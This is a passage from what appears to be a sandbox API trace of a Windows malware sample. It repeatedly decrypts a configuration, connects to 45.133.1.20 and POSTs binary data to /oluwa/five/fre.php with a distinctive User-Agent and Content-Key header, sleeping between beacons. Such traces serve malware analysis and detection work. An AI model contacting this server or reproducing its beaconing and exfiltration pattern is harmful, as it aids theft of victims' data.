Flags=0x0, Size=0x4) returned 0x6baa40 [0195.092] socket (af=2, type=1, protocol=6) returned 0x4d4 [0195.092] connect (s=0x4d4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0195.118] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0195.118] GetProcessHeap () returned 0x6a0000 [0195.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0195.118] GetProcessHeap () returned 0x6a0000 [0195.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0195.119] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0195.121] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0195.121] GetProcessHeap () returned 0x6a0000 [0195.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0195.121] GetProcessHeap () returned 0x6a0000 [0195.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0195.121] GetProcessHeap () returned 0x6a0000 [0195.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0195.123] GetProcessHeap () returned 0x6a0000 [0195.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0195.124] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0195.125] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0195.125] GetProcessHeap () returned 0x6a0000 [0195.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0195.125] GetProcessHeap () returned 0x6a0000 [0195.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0195.126] send (s=0x4d4, buf=0x6b5c98*, len=242, flags=0) returned 242 [0195.126] send (s=0x4d4, buf=0x6bb998*, len=159, flags=0) returned 159 [0195.127] GetProcessHeap () returned 0x6a0000 [0195.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0195.127] recv (in: s=0x4d4, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0195.218] GetProcessHeap () returned 0x6a0000 [0195.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0195.219] GetProcessHeap () returned 0x6a0000 [0195.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0195.220] GetProcessHeap () returned 0x6a0000 [0195.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0195.221] GetProcessHeap () returned 0x6a0000 [0195.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0195.221] closesocket (s=0x4d4) returned 0 [0195.222] GetProcessHeap () returned 0x6a0000 [0195.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0195.222] GetProcessHeap () returned 0x6a0000 [0195.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0195.223] GetProcessHeap () returned 0x6a0000 [0195.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0195.223] GetProcessHeap () returned 0x6a0000 [0195.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0195.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe44) returned 0x4d4 [0195.226] Sleep (dwMilliseconds=0xea60) [0195.227] GetProcessHeap () returned 0x6a0000 [0195.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0195.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.229] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.241] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0195.253] GetProcessHeap () returned 0x6a0000 [0195.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b66f8 [0195.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.254] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b66f8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0195.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.255] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.256] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.257] GetProcessHeap () returned 0x6a0000 [0195.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b66f8 | out: hHeap=0x6a0000) returned 1 [0195.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.262] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0195.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.275] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0195.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.276] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0195.276] GetProcessHeap () returned 0x6a0000 [0195.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0195.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.278] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0195.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.279] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0195.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.283] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0195.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.285] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0195.285] GetProcessHeap () returned 0x6a0000 [0195.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0195.285] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0195.285] GetProcessHeap () returned 0x6a0000 [0195.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0195.286] GetProcessHeap () returned 0x6a0000 [0195.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0195.286] GetProcessHeap () returned 0x6a0000 [0195.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0195.287] GetProcessHeap () returned 0x6a0000 [0195.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0195.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.288] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.297] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0195.309] GetProcessHeap () returned 0x6a0000 [0195.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0195.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.311] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0195.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.312] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.314] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.314] GetProcessHeap () returned 0x6a0000 [0195.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0195.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.316] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0195.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.317] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0195.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.318] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0195.318] GetProcessHeap () returned 0x6a0000 [0195.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0195.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.320] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0195.321] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.321] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0195.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.322] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0195.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.323] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0195.323] GetProcessHeap () returned 0x6a0000 [0195.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0195.323] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0195.323] GetProcessHeap () returned 0x6a0000 [0195.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0195.323] socket (af=2, type=1, protocol=6) returned 0x4d8 [0195.324] connect (s=0x4d8, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0195.346] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0195.346] GetProcessHeap () returned 0x6a0000 [0195.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0195.346] GetProcessHeap () returned 0x6a0000 [0195.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0195.349] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0195.351] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0195.352] GetProcessHeap () returned 0x6a0000 [0195.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0195.352] GetProcessHeap () returned 0x6a0000 [0195.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0195.352] GetProcessHeap () returned 0x6a0000 [0195.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0195.353] GetProcessHeap () returned 0x6a0000 [0195.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0195.353] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0195.354] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0195.354] GetProcessHeap () returned 0x6a0000 [0195.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0195.354] GetProcessHeap () returned 0x6a0000 [0195.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0195.355] send (s=0x4d8, buf=0x6b5c98*, len=242, flags=0) returned 242 [0195.356] send (s=0x4d8, buf=0x6bb998*, len=159, flags=0) returned 159 [0195.356] GetProcessHeap () returned 0x6a0000 [0195.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0195.356] recv (in: s=0x4d8, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0195.433] GetProcessHeap () returned 0x6a0000 [0195.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0195.433] GetProcessHeap () returned 0x6a0000 [0195.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0195.434] GetProcessHeap () returned 0x6a0000 [0195.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0195.435] GetProcessHeap () returned 0x6a0000 [0195.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0195.435] closesocket (s=0x4d8) returned 0 [0195.436] GetProcessHeap () returned 0x6a0000 [0195.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0195.436] GetProcessHeap () returned 0x6a0000 [0195.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0195.436] GetProcessHeap () returned 0x6a0000 [0195.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0195.437] GetProcessHeap () returned 0x6a0000 [0195.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0195.437] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5ec) returned 0x4d8 [0195.440] Sleep (dwMilliseconds=0xea60) [0195.442] GetProcessHeap () returned 0x6a0000 [0195.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0195.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.443] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.452] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0195.462] GetProcessHeap () returned 0x6a0000 [0195.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c58c8 [0195.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.463] CryptImportKey (in: hProv=0x6bec18, pbData=0x6c58c8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0195.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.465] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.466] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.466] GetProcessHeap () returned 0x6a0000 [0195.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c58c8 | out: hHeap=0x6a0000) returned 1 [0195.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.472] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0195.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.473] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0195.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.474] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0195.474] GetProcessHeap () returned 0x6a0000 [0195.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0195.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.475] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0195.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.481] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0195.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.482] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0195.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.484] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0195.484] GetProcessHeap () returned 0x6a0000 [0195.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0195.484] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0195.484] GetProcessHeap () returned 0x6a0000 [0195.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0195.485] GetProcessHeap () returned 0x6a0000 [0195.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0195.485] GetProcessHeap () returned 0x6a0000 [0195.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0195.485] GetProcessHeap () returned 0x6a0000 [0195.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0195.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.487] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.505] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0195.518] GetProcessHeap () returned 0x6a0000 [0195.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0195.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.519] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0195.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.520] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.522] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.522] GetProcessHeap () returned 0x6a0000 [0195.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0195.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.524] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0195.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.525] CryptDestroyKey (hKey=0x6ad020) returned 1 [0195.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.526] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0195.526] GetProcessHeap () returned 0x6a0000 [0195.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0195.527] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.528] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0195.528] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.529] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0195.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.530] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0195.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.534] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0195.534] GetProcessHeap () returned 0x6a0000 [0195.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0195.534] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0195.534] GetProcessHeap () returned 0x6a0000 [0195.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0195.534] socket (af=2, type=1, protocol=6) returned 0x4dc [0195.537] connect (s=0x4dc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0195.562] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0195.562] GetProcessHeap () returned 0x6a0000 [0195.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0195.562] GetProcessHeap () returned 0x6a0000 [0195.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0195.563] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0195.564] wvsprintfA (in: 